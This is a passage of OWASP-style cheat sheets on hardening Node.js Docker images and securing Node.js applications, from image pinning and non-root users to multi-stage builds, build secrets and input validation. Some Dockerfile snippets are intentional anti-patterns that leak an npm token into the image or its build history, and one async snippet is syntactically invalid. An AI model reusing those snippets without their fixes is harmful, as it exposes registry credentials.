  2. The node Docker image is based on a full-fledged operating system, full of libraries and tools that you may or may not need to run your Node.js web application. This has two downsides. Firstly a bigger image means a bigger download size which, besides increasing the storage requirement, means more time to download and re-build the image. Secondly, it means you\u2019re potentially introducing security vulnerabilities, that may exist in all of these libraries and tools, into the image.

In fact, the node Docker image is quite big and includes hundreds of security vulnerabilities of different types and severities. If you\u2019re using it, then by default your starting point is going to be a baseline of 642 security vulnerabilities, and hundreds of megabytes of image data that is downloaded on every pull and build.

The recommendations for building better Docker images are:

  1. Use small Docker images\u2014this will translate to a smaller software footprint on the Docker image reducing the potential vulnerability vectors, and a smaller size, which will speed up the image build process
  2. Use the Docker image digest, which is the static SHA256 hash of the image. This ensures that you are getting deterministic Docker image builds from the base image.

Based on this, let\u2019s ensure that we use the Long Term Support (LTS) version of Node.js, and the minimal alpine image type to have the smallest size and software footprint on the image:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#from-nodelts-alpine","title":"FROM node:lts-alpine","text":"

Nonetheless, this base image directive will still pull new builds of that tag. We can find the SHA256 hash for it in the Docker Hub for this Node.js tag, or by running the following command once we pulled this image locally, and locate the Digest field in the output:

$ docker pull node:lts-alpine\nlts-alpine: Pulling from library/node\n0a6724ff3fcd: Already exists\n9383f33fa9f3: Already exists\nb6ae88d676fe: Already exists\n565e01e00588: Already exists\nDigest: sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nStatus: Downloaded newer image for node:lts-alpine\ndocker.io/library/node:lts-alpine\n

Another way to find the SHA256 hash is by running the following command:

$ docker images --digests\nREPOSITORY                     TAG              DIGEST                                                                    IMAGE ID       CREATED             SIZE\nnode                           lts-alpine       sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a   51d926a5599d   2 weeks ago         116MB\n

Now we can update the Dockerfile for this Node.js Docker image as follows:

FROM node@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm install\nCMD \"npm\" \"start\"\n

However, the Dockerfile above, only specifies the Node.js Docker image name without an image tag which creates ambiguity for which exact image tag is being used\u2014it\u2019s not readable, hard to maintain and doesn\u2019t create a good developer experience.

Let\u2019s fix it by updating the Dockerfile, providing the full base image tag for the Node.js version that corresponds to that SHA256 hash:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm install\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#2-install-only-production-dependencies-in-the-nodejs-docker-image","title":"2) Install only production dependencies in the Node.js Docker image","text":"

The following Dockerfile directive installs all dependencies in the container, including devDependencies, which aren\u2019t needed for a functional application to work. It adds an unneeded security risk from packages used as development dependencies, as well as inflating the image size unnecessarily.

RUN npm install

Enforce deterministic builds with npm ci. This prevents surprises in a continuous integration (CI) flow because it halts if any deviations from the lockfile are made.

In the case of building a Docker image for production we want to ensure that we only install production dependencies in a deterministic way, and this brings us to the following recommendation for the best practice for installing npm dependencies in a container image:

RUN npm ci --only=production

The updated Dockerfile contents in this stage are as follows:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm ci --only=production\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#3-optimize-nodejs-tooling-for-production","title":"3) Optimize Node.js tooling for production","text":"

When you build your Node.js Docker image for production, you want to ensure that all frameworks and libraries are using the optimal settings for performance and security.

This brings us to add the following Dockerfile directive:

ENV NODE\\_ENV production

At first glance, this looks redundant, since we already specified only production dependencies in the npm install phase\u2014so why is this necessary?

Developers mostly associate the NODE_ENV=production environment variable setting with the installation of production-related dependencies, however, this setting also has other effects which we need to be aware of.

Some frameworks and libraries may only turn on the optimized configuration that is suited to production if that NODE_ENV environment variable is set to production. Putting aside our opinion on whether this is a good or bad practice for frameworks to take, it is important to know this.

As an example, the Express documentation outlines the importance of setting this environment variable for enabling performance and security related optimizations:

The performance impact of the NODE_ENV variable could be very significant.

Many of the other libraries that you are relying on may also expect this variable to be set, so we should set this in our Dockerfile.

The updated Dockerfile should now read as follows with the NODE_ENV environment variable setting baked in:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nENV NODE_ENV production\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm ci --only=production\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#4-dont-run-containers-as-root","title":"4) Don\u2019t run containers as root","text":"

The principle of least privilege is a long-time security control from the early days of Unix and we should always follow this when we\u2019re running our containerized Node.js web applications.

The threat assessment is pretty straight-forward\u2014if an attacker is able to compromise the web application in a way that allows for command injection or directory path traversal, then these will be invoked with the user who owns the application process. If that process happens to be root then they can do virtually everything within the container, including [attempting a container escape or privilege escalation. Why would we want to risk it? You\u2019re right, we don\u2019t.

Repeat after me: \u201cfriends don\u2019t let friends run containers as root!\u201d

The official node Docker image, as well as its variants like alpine, include a least-privileged user of the same name: node. However, it\u2019s not enough to just run the process as node. For example, the following might not be ideal for an application to function well:

USER node\nCMD \"npm\" \"start\"\n

The reason for that is the USER Dockerfile directive only ensures that the process is owned by the node user. What about all the files we copied earlier with the COPY instruction? They are owned by root. That\u2019s how Docker works by default.

The complete and proper way of dropping privileges is as follows, also showing our up to date Dockerfile practices up to this point:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nENV NODE_ENV production\nWORKDIR /usr/src/app\nCOPY --chown=node:node . /usr/src/app\nRUN npm ci --only=production\nUSER node\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#5-properly-handle-events-to-safely-terminate-a-nodejs-docker-web-application","title":"5) Properly handle events to safely terminate a Node.js Docker web application","text":"

One of the most common mistakes I see with blogs and articles about containerizing Node.js applications when running in Docker containers is the way that they invoke the process. All of the following and their variants are bad patterns you should avoid:

Let\u2019s dig in! I\u2019ll walk you through the differences between them and why they\u2019re all patterns to avoid.

The following concerns are key in order to understanding the context for properly running and terminating Node.js Docker applications:

  1. An orchestration engine, such as Docker Swarm, Kubernetes, or even just Docker engine itself, needs a way to send signals to the process in the container. Mostly, these are signals to terminate an application, such as SIGTERM and SIGKILL.
  2. The process may run indirectly, and if that happens then it\u2019s not always guaranteed that it will receive these signals.
  3. The Linux kernel treats processes that run as process ID 1 (PID) differently than any other process ID.

Equipped with that knowledge, let\u2019s begin investigating the ways of invoking the process for a container, starting off with the example from the Dockerfile we\u2019re building:

CMD \"npm\" \"start\"

The caveat here is two fold. Firstly, we\u2019re indirectly running the node application by directly invoking the npm client. Who\u2019s to say that the npm CLI forwards all events to the node runtime? It actually doesn\u2019t, and we can easily test that.

Make sure that in your Node.js application you set an event handler for the SIGHUP signal which logs to the console every time you\u2019re sending an event. A simple code example should look as follows:

function handle(signal) {\n   console.log(`*^!@4=> Received event: ${signal}`)\n}\nprocess.on('SIGHUP', handle)\n

Then run the container, and once it\u2019s up specifically send it the SIGHUP signal using the docker CLI and the special --signal command-line flag:

$ docker kill --signal=SIGHUP elastic\\_archimedes

Nothing happened, right? That\u2019s because the npm client doesn\u2019t forward any signals to the node process that it spawned.

The other caveat has to do with the different ways in which way you can specify the CMD directive in the Dockerfile. There are two ways, and they are not the same:

  1. the shellform notation, in which the container spawns a shell interpreter that wraps the process. In such cases, the shell may not properly forward signals to your process.
  2. the execform notation, which directly spawns a process without wrapping it in a shell. It is specified using the JSON array notation, such as: CMD [\u201cnpm\u201d, \u201cstart\u201d]. Any signals sent to the container are directly sent to the process.

Based on that knowledge, we want to improve our Dockerfile process execution directive as follows:

CMD \\[\"node\", \"server.js\"\\]

We are now invoking the node process directly, ensuring that it receives all of the signals sent to it, without it being wrapped in a shell interpreter.

However, this introduces another pitfall.

When processes run as PID 1 they effectively take on some of the responsibilities of an init system, which is typically responsible for initializing an operating system and processes. The kernel treats PID 1 in a different way than it treats other process identifiers. This special treatment from the kernel means that the handling of a SIGTERM signal to a running process won\u2019t invoke a default fallback behavior of killing the process if the process doesn\u2019t already set a handler for it.

To quote the Node.js Docker working group recommendation on this:\u00a0 \u201cNode.js was not designed to run as PID 1 which leads to unexpected behaviour when running inside of Docker. For example, a Node.js process running as PID 1 will not respond to SIGINT (CTRL-C) and similar signals\u201d.

The way to go about it then is to use a tool that will act like an init process, in that it is invoked with PID 1, then spawns our Node.js application as another process whilst ensuring that all signals are proxied to that Node.js process. If possible, we\u2019d like a small as possible tooling footprint for doing so to not risk having security vulnerabilities added to our container image.

One such tool is dumb-init which is statically linked and has a small footprint. Here\u2019s how we\u2019ll set it up:

RUN apk add dumb-init\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

This brings us to the following up to date Dockerfile. You\u2019ll notice that we placed the dumb-init package install right after the image declaration, so we can take advantage of Docker\u2019s caching of layers:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nRUN apk add dumb-init\nENV NODE_ENV production\nWORKDIR /usr/src/app\nCOPY --chown=node:node . .\nRUN npm ci --only=production\nUSER node\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

Good to know: docker kill and docker stop commands only send signals to the container process with PID 1. If you\u2019re running a shell script that runs your Node.js application, then take note that a shell instance\u2014such as /bin/sh, for example\u2014doesn\u2019t forward signals to child processes, which means your app will never get a SIGTERM.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#6-graceful-tear-down-for-your-nodejs-web-applications","title":"6) Graceful tear down for your Node.js web applications","text":"

If we\u2019re already discussing process signals that terminate applications, let\u2019s make sure we\u2019re shutting them down properly and gracefully without disrupting users.

When a Node.js application receives an interrupt signal, also known as SIGINT, or CTRL+C, it will cause an abrupt process kill, unless any event handlers were set of course to handle it in a different behavior. This means that connected clients to a web application will be immediately disconnected. Now, imagine hundreds of Node.js web containers orchestrated by Kubernetes, going up and down as needs arise to scale or manage errors. Not the greatest user experience.

You can easily simulate this problem. Here\u2019s a stock Fastify web application example, with an inherent delayed response of 60 seconds for an endpoint:

fastify.get('/delayed', async (request, reply) => {\n const SECONDS_DELAY = 60000\n await new Promise(resolve => {\n     setTimeout(() => resolve(), SECONDS_DELAY)\n })\n return { hello: 'delayed world' }\n})\n\nconst start = async () => {\n try {\n   await fastify.listen(PORT, HOST)\n   console.log(`*^!@4=> Process id: ${process.pid}`)\n } catch (err) {\n   fastify.log.error(err)\n   process.exit(1)\n }\n}\n\nstart()\n

Run this application and once it\u2019s running send a simple HTTP request to this endpoint:

$ time curl https://localhost:3000/delayed

Hit CTRL+C in the running Node.js console window and you\u2019ll see that the curl request exited abruptly. This simulates the same experience your users would receive when containers tear down.

To provide a better experience, we can do the following:

  1. Set an event handler for the various termination signals like SIGINT and SIGTERM.
  2. The handler waits for clean up operations like database connections, ongoing HTTP requests and others.
  3. The handler then terminates the Node.js process.

Specifically with Fastify, we can have our handler call on fastify.close() which returns a promise that we will await, and Fastify will also take care to respond to every new connection with the HTTP status code 503 to signal that the application is unavailable.

Let\u2019s add our event handler:

async function closeGracefully(signal) {\n   console.log(`*^!@4=> Received signal to terminate: ${signal}`)\n\n   await fastify.close()\n   // await db.close() if we have a db connection in this app\n   // await other things we should cleanup nicely\n   process.exit()\n}\nprocess.on('SIGINT', closeGracefully)\nprocess.on('SIGTERM', closeGracefully)\n

Admittedly, this is more of a generic web application concern than Dockerfile related, but is even more important in orchestrated environments.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#7-find-and-fix-security-vulnerabilities-in-your-nodejs-docker-image","title":"7) Find and fix security vulnerabilities in your Node.js docker image","text":"

See Docker Security Cheat Sheet - Use static analysis tools

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#8-use-multi-stage-builds","title":"8) Use multi-stage builds","text":"

Multi-stage builds are a great way to move from a simple, yet potentially erroneous Dockerfile, into separated steps of building a Docker image, so we can avoid leaking sensitive information. Not only that, but we can also use a bigger Docker base image to install our dependencies, compile any native npm packages if needed, and then copy all these artifacts into a small production base image, like our alpine example.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#prevent-sensitive-information-leak","title":"Prevent sensitive information leak","text":"

The use-case here to avoid sensitive information leakage is more common than you think.

If you\u2019re building Docker images for work, there\u2019s a high chance that you also maintain private npm packages. If that\u2019s the case, then you probably needed to find some way to make that secret NPM_TOKEN available to the npm install.

Here\u2019s an example for what I\u2019m talking about:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nRUN apk add dumb-init\nENV NODE_ENV production\nENV NPM_TOKEN 1234\nWORKDIR /usr/src/app\nCOPY --chown=node:node . .\n#RUN npm ci --only=production\nRUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production\nUSER node\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

Doing this, however, leaves the .npmrc file with the secret npm token inside the Docker image. You could attempt to improve it by deleting it afterwards, like this:

RUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production\nRUN rm -rf .npmrc\n

However, now the .npmrc file is available in a different layer of the Docker image. If this Docker image is public, or someone is able to access it somehow, then your token is compromised. A better improvement would be as follows:

RUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production; \\\n   rm -rf .npmrc\n

The problem now is that the Dockerfile itself needs to be treated as a secret asset, because it contains the secret npm token inside it.

Luckily, Docker supports a way to pass arguments into the build process:

ARG NPM_TOKEN\nRUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production; \\\n   rm -rf .npmrc\n

And then we build it as follows:

$ docker build . -t nodejs-tutorial --build-arg NPM\\_TOKEN=1234

I know you were thinking that we\u2019re all done at this point but, sorry to disappoint \ud83d\ude42

That\u2019s how it is with security\u2014sometimes the obvious things are yet just another pitfall.

What\u2019s the problem now, you ponder? Build arguments passed like that to Docker are kept in the history log. Let\u2019s see with our own eyes. Run this command:

$ docker history nodejs-tutorial

which prints the following:

IMAGE          CREATED              CREATED BY                                      SIZE      COMMENT\nb4c2c78acaba   About a minute ago   CMD [\"dumb-init\" \"node\" \"server.js\"]            0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   USER node                                       0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   RUN |1 NPM_TOKEN=1234 /bin/sh -c echo \"//reg\u2026   5.71MB    buildkit.dockerfile.v0\n<missing>      About a minute ago   ARG NPM_TOKEN                                   0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   COPY . . # buildkit                             15.3kB    buildkit.dockerfile.v0\n<missing>      About a minute ago   WORKDIR /usr/src/app                            0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   ENV NODE_ENV=production                         0B        buildkit.dockerfile.v0\n<missing>      About a minute ago   RUN /bin/sh -c apk add dumb-init # buildkit     1.65MB    buildkit.dockerfile.v0\n

Did you spot the secret npm token there? That\u2019s what I mean.

There\u2019s a great way to manage secrets for the container image, but this is the time to introduce multi-stage builds as a mitigation for this issue, as well as showing how we can build minimal images.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#introducing-multi-stage-builds-for-nodejs-docker-images","title":"Introducing multi-stage builds for Node.js Docker images","text":"

Just like that principle in software development of Separation of Concerns, we\u2019ll apply the same ideas in order to build our Node.js Docker images. We\u2019ll have one image that we use to build everything that we need for the Node.js application to run, which in a Node.js world, means installing npm packages, and compiling native npm modules if necessary. That will be our first stage.

The second Docker image, representing the second stage of the Docker build, will be the production Docker image. This second and last stage is the image that we actually optimize for and publish to a registry, if we have one. That first image that we\u2019ll refer to as the build image, gets discarded and is left as a dangling image in the Docker host that built it, until it gets cleaned.

Here is the update to our Dockerfile that represents our progress so far, but separated into two stages:

# --------------> The build image\nFROM node:latest AS build\nARG NPM_TOKEN\nWORKDIR /usr/src/app\nCOPY package*.json /usr/src/app/\nRUN echo \"//registry.npmjs.org/:_authToken=$NPM_TOKEN\" > .npmrc && \\\n   npm ci --only=production && \\\n   rm -f .npmrc\n\n# --------------> The production image\nFROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nRUN apk add dumb-init\nENV NODE_ENV production\nUSER node\nWORKDIR /usr/src/app\nCOPY --chown=node:node --from=build /usr/src/app/node_modules /usr/src/app/node_modules\nCOPY --chown=node:node . /usr/src/app\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

As you can see, I chose a bigger image for the build stage because I might need tooling like gcc (the GNU Compiler Collection) to compile native npm packages, or for other needs.

In the second stage, there\u2019s a special notation for the COPY directive that copies the node_modules/ folder from the build Docker image into this new production base image.

Also, now, do you see that NPM_TOKEN passed as build argument to the build intermediary Docker image? It\u2019s not visible anymore in the docker history nodejs-tutorial command output because it doesn\u2019t exist in our production docker image.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#9-keeping-unnecessary-files-out-of-your-nodejs-docker-images","title":"9) Keeping unnecessary files out of your Node.js Docker images","text":"

You have a .gitignore file to avoid polluting the git repository with unnecessary files, and potentially sensitive files too, right? The same applies to Docker images.

Docker has a .dockerignore which will ensure it skips sending any glob pattern matches inside it to the Docker daemon. Here is a list of files to give you an idea of what you might be putting into your Docker image that we\u2019d ideally want to avoid:

.dockerignore\nnode_modules\nnpm-debug.log\nDockerfile\n.git\n.gitignore\n

As you can see, the node_modules/ is actually quite important to skip because if we hadn\u2019t ignored it, then the simplistic Dockerfile version that we started with would have caused the local node_modules/ folder to be copied over to the container as-is.

FROM node@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm install\nCMD \"npm\" \"start\"\n

In fact, it\u2019s even more important to have a .dockerignore file when you are practicing multi-stage Docker builds. To refresh your memory on how the 2nd stage Docker build looks like:

# --------------> The production image\nFROM node:lts-alpine\nRUN apk add dumb-init\nENV NODE_ENV production\nUSER node\nWORKDIR /usr/src/app\nCOPY --chown=node:node --from=build /usr/src/app/node_modules /usr/src/app/node_modules\nCOPY --chown=node:node . /usr/src/app\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

The importance of having a .dockerignore is that when we do a COPY . /usr/src/app from the 2nd Dockerfile stage, we\u2019re also copying over any local node_modules/ to the Docker image. That\u2019s a big no-no as we may be copying over modified source code inside node_modules/.

On top of that, since we\u2019re using the wildcard COPY . we may also be copying into the Docker image sensitive files that include credentials or local configuration.

The take-away here for a .dockerignore file is:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#10-mounting-secrets-into-the-docker-build-image","title":"10) Mounting secrets into the Docker build image","text":"

One thing to note about the .dockerignore file is that it is an all or nothing approach and can\u2019t be turned on or off per build stages in a Docker multi-stage build.

Why is it important? Ideally, we would want to use the .npmrc file in the build stage, as we may need it because it includes a secret npm token to access private npm packages. Perhaps it also needs a specific proxy or registry configuration to pull packages from.

This means that it makes sense to have the .npmrc file available to the build stage\u2014however, we don\u2019t need it at all in the second stage for the production image, nor do we want it there as it may include sensitive information, like the secret npm token.

One way to mitigate this .dockerignore caveat is to mount a local file system that will be available for the build stage, but there\u2019s a better way.

Docker supports a relatively new capability referred to as Docker secrets, and is a natural fit for the case we need with .npmrc. Here is how it works:

Let\u2019s see how all of it works together. First the updated .dockerignore file:

.dockerignore\nnode_modules\nnpm-debug.log\nDockerfile\n.git\n.gitignore\n.npmrc\n

Then, the complete Dockerfile, with the updated RUN directive to install npm packages while specifying the .npmrc mount point:

# --------------> The build image\nFROM node:latest AS build\nWORKDIR /usr/src/app\nCOPY package*.json /usr/src/app/\nRUN --mount=type=secret,mode=0644,id=npmrc,target=/usr/src/app/.npmrc npm ci --only=production\n\n# --------------> The production image\nFROM node:lts-alpine\nRUN apk add dumb-init\nENV NODE_ENV production\nUSER node\nWORKDIR /usr/src/app\nCOPY --chown=node:node --from=build /usr/src/app/node_modules /usr/src/app/node_modules\nCOPY --chown=node:node . /usr/src/app\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

And finally, the command that builds the Node.js Docker image:

docker build . -t nodejs-tutorial --secret id=npmrc,src=.npmrc\n

Note: Secrets are a new feature in Docker and if you\u2019re using an older version, you might need to enable it Buildkit as follows:

DOCKER_BUILDKIT=1 docker build . -t nodejs-tutorial --build-arg NPM_TOKEN=1234 --secret id=npmrc,src=.npmrc\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html","title":"NodeJS Security Cheat Sheet","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet lists actions developers can take to develop secure Node.js applications. Each item has a brief explanation and solution that is specific to the Node.js environment.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#context","title":"Context","text":"

Node.js applications are increasing in number and they are no different from other frameworks and programming languages. Node.js applications are prone to all kinds of web application vulnerabilities.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#objective","title":"Objective","text":"

This cheat sheet aims to provide a list of best practices to follow during development of Node.js applications.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#recommendations","title":"Recommendations","text":"

There are several recommendations to enhance security of your Node.js applications. These are categorized as:

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#application-security","title":"Application Security","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-flat-promise-chains","title":"Use flat Promise chains","text":"

Asynchronous callback functions are one of the strongest features of Node.js. However, increasing layers of nesting within callback functions can become a problem. Any multistage process can become nested 10 or more levels deep. This problem is referred to as a \"Pyramid of Doom\" or \"Callback Hell\". In such code, the errors and results get lost within the callback. Promises are a good way to write asynchronous code without getting into nested pyramids. Promises provide top-down execution while being asynchronous by delivering errors and results to next .then function.

Another advantage of Promises is the way Promises handle errors. If an error occurs in a Promise class, it skips over the .then functions and invokes the first .catch function it finds. This way Promises provide a higher assurance of capturing and handling errors. As a principle, you can make all your asynchronous code (apart from emitters) return promises. It should be noted that Promise calls can also become a pyramid. In order to completely stay away from \"Callback Hell\", flat Promise chains should be used. If the module you are using does not support Promises, you can convert base object to a Promise by using Promise.promisifyAll() function.

The following code snippet is an example of \"Callback Hell\":

function func1(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\nfunction func2(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\nfunction func3(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\nfunction func4(name, callback) {\n// operations that takes a bit of time and then calls the callback\n}\n\nfunc1(\"input1\", function(err, result1){\nif(err){\n// error operations\n}\nelse {\n//some operations\nfunc2(\"input2\", function(err, result2){\nif(err){\n//error operations\n}\nelse{\n//some operations\nfunc3(\"input3\", function(err, result3){\nif(err){\n//error operations\n}\nelse{\n// some operations\nfunc4(\"input 4\", function(err, result4){\nif(err){\n// error operations\n}\nelse {\n// some operations\n}\n});\n}\n});\n}\n});\n}\n});\n

The above code can be securely written as follows using a flat Promise chain:

function func1(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction func2(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction func3(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction func4(name) {\n// operations that takes a bit of time and then resolves the promise\n}\n\nfunc1(\"input1\")\n.then(function (result){\nreturn func2(\"input2\");\n})\n.then(function (result){\nreturn func3(\"input3\");\n})\n.then(function (result){\nreturn func4(\"input4\");\n})\n.catch(function (error) {\n// error operations\n});\n

And using async/await:

function async func1(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction async func2(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction async func3(name) {\n// operations that takes a bit of time and then resolves the promise\n}\nfunction async func4(name) {\n// operations that takes a bit of time and then resolves the promise\n}\n\n(async() => {\ntry {\nlet res1 = await func1(\"input1\");\nlet res2 = await func2(\"input2\");\nlet res3 = await func3(\"input2\");\nlet res4 = await func4(\"input2\");\n} catch(err) {\n// error operations\n}\n})();\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-request-size-limits","title":"Set request size limits","text":"

Buffering and parsing of request bodies can be a resource intensive task. If there is no limit on the size of requests, attackers can send requests with large request bodies that can exhaust server memory and/or fill disk space. You can limit the request body size for all requests using raw-body.

const contentType = require('content-type')\nconst express = require('express')\nconst getRawBody = require('raw-body')\n\nconst app = express()\n\napp.use(function (req, res, next) {\nif (!['POST', 'PUT', 'DELETE'].includes(req.method)) {\nnext()\nreturn\n}\n\ngetRawBody(req, {\nlength: req.headers['content-length'],\nlimit: '1kb',\nencoding: contentType.parse(req).parameters.charset\n}, function (err, string) {\nif (err) return next(err)\nreq.text = string\nnext()\n})\n})\n

However, fixing a request size limit for all requests may not be the correct behavior, since some requests may have a large payload in the request body, such as when uploading a file. Also, input with a JSON type is more dangerous than a multipart input, since parsing JSON is a blocking operation. Therefore, you should set request size limits for different content types. You can accomplish this very easily with express middleware as follows:

app.use(express.urlencoded({ extended: true, limit: \"1kb\" }));\napp.use(express.json({ limit: \"1kb\" }));\n

It should be noted that attackers can change the Content-Type header of the request and bypass request size limits. Therefore, before processing the request, data contained in the request should be validated against the content type stated in the request headers. If content type validation for each request affects the performance severely, you can only validate specific content types or request larger than a predetermined size.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#do-not-block-the-event-loop","title":"Do not block the event loop","text":"

Node.js is very different from common application platforms that use threads. Node.js has a single-thread event-driven architecture. By means of this architecture, throughput becomes high and the programming model becomes simpler. Node.js is implemented around a non-blocking I/O event loop. With this event loop, there is no waiting on I/O or context switching. The event loop looks for events and dispatches them to handler functions. Because of this, when CPU intensive JavaScript operations are executed, the event loop waits for them to finish. This is why such operations are called \"blocking\". To overcome this problem, Node.js allows assigning callbacks to IO-blocked events. This way, the main application is not blocked and callbacks run asynchronously. Therefore, as a general principle, all blocking operations should be done asynchronously so that the event loop is not blocked.

Even if you perform blocking operations asynchronously, your application may still not serve as expected. This happens if there is a code outside the callback that relies on the code within the callback to run first. For example, consider the following code:

const fs = require('fs');\nfs.readFile('/file.txt', (err, data) => {\n// perform actions on file content\n});\nfs.unlinkSync('/file.txt');\n

In the above example, unlinkSync function may run before the callback, which will delete the file before the desired actions on the file content is done. Such race conditions can also affect the security of your application. An example would be a scenario where authentication is performed in a callback and authenticated actions are run synchronously. In order to eliminate such race conditions, you can write all operations that rely on each other in a single non-blocking function. By doing so, you can guarantee that all operations are executed in the correct order. For example, above code example can be written in a non-blocking way as follows:

const fs = require('fs');\nfs.readFile('/file.txt', (err, data) => {\n// perform actions on file content\nfs.unlink('/file.txt', (err) => {\nif (err) throw err;\n});\n});\n

In the above code, call to unlink the file and other file operations are within the same callback. This provides the correct order of operations.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#perform-input-validation","title":"Perform input validation","text":"

Input validation is a crucial part of application security. Input validation failures can result in many types of application attacks. These include SQL Injection, Cross-Site Scripting, Command Injection, Local/Remote File Inclusion, Denial of Service, Directory Traversal, LDAP Injection and many other injection attacks. In order to avoid these attacks, input to your application should be sanitized first. The best input validation technique is to use a list of accepted inputs. However, if this is not possible, input should be first checked against expected input scheme and dangerous inputs should be escaped. In order to ease input validation in Node.js applications, there are some modules like validator and mongo-express-sanitize. For detailed information on input validation, please refer to Input Validation Cheat Sheet.

JavaScript is a dynamic language and depending on how the framework parses a URL, the data seen by the application code can take many forms. Here are some examples after parsing a query string in express.js:

URL Content of request.query.foo in code ?foo=bar 'bar' (string) ?foo=bar&foo=baz ['bar', 'baz'] (array of string) ?foo[]=bar ['bar'] (array of string) ?foo[]=bar&foo[]=baz ['bar', 'baz'] (array of string) ?foo[bar]=baz { bar : 'baz' } (object with a key) ?foo[]=bar ['bar'] (array of string) ?foo[]baz=bar ['bar'] (array of string - postfix is lost) ?foo[][baz]=bar [ { baz: 'bar' } ] (array of object) ?foo[bar][baz]=bar { foo: { bar: { baz: 'bar' } } } (object tree) ?foo[10]=bar&foo[9]=baz [ 'baz', 'bar' ] (array of string - notice order) ?foo[toString]=bar {} (object where calling toString() will fail)"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#perform-output-escaping","title":"Perform output escaping","text":"

In addition to input validation, you should escape all HTML and JavaScript content shown to users via application in order to prevent cross-site scripting (XSS) attacks. You can use escape-html or node-esapi libraries to perform output escaping.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#perform-application-activity-logging","title":"Perform application activity logging","text":"

Logging application activity is an encouraged good practice. It makes it easier to debug any errors encountered during application runtime. It is also useful for security concerns, since it can be used during incident response. In addition, these logs can be used to feed Intrusion Detection/Prevention Systems (IDS/IPS). In Node.js, there are modules such as Winston, Bunyan, or Pino to perform application activity logging. These modules enable streaming and querying logs, and they provide a way to handle uncaught exceptions.

With the following code, you can log application activities in both console and a desired log file:

const logger = new (Winston.Logger) ({\ntransports: [\nnew (winston.transports.Console)(),\nnew (winston.transports.File)({ filename: 'application.log' })\n],\nlevel: 'verbose'\n});\n

You can provide different transports so that you can save errors to a separate log file and general application logs to a different log file. Additional information on security logging can be found in Logging Cheat Sheet.

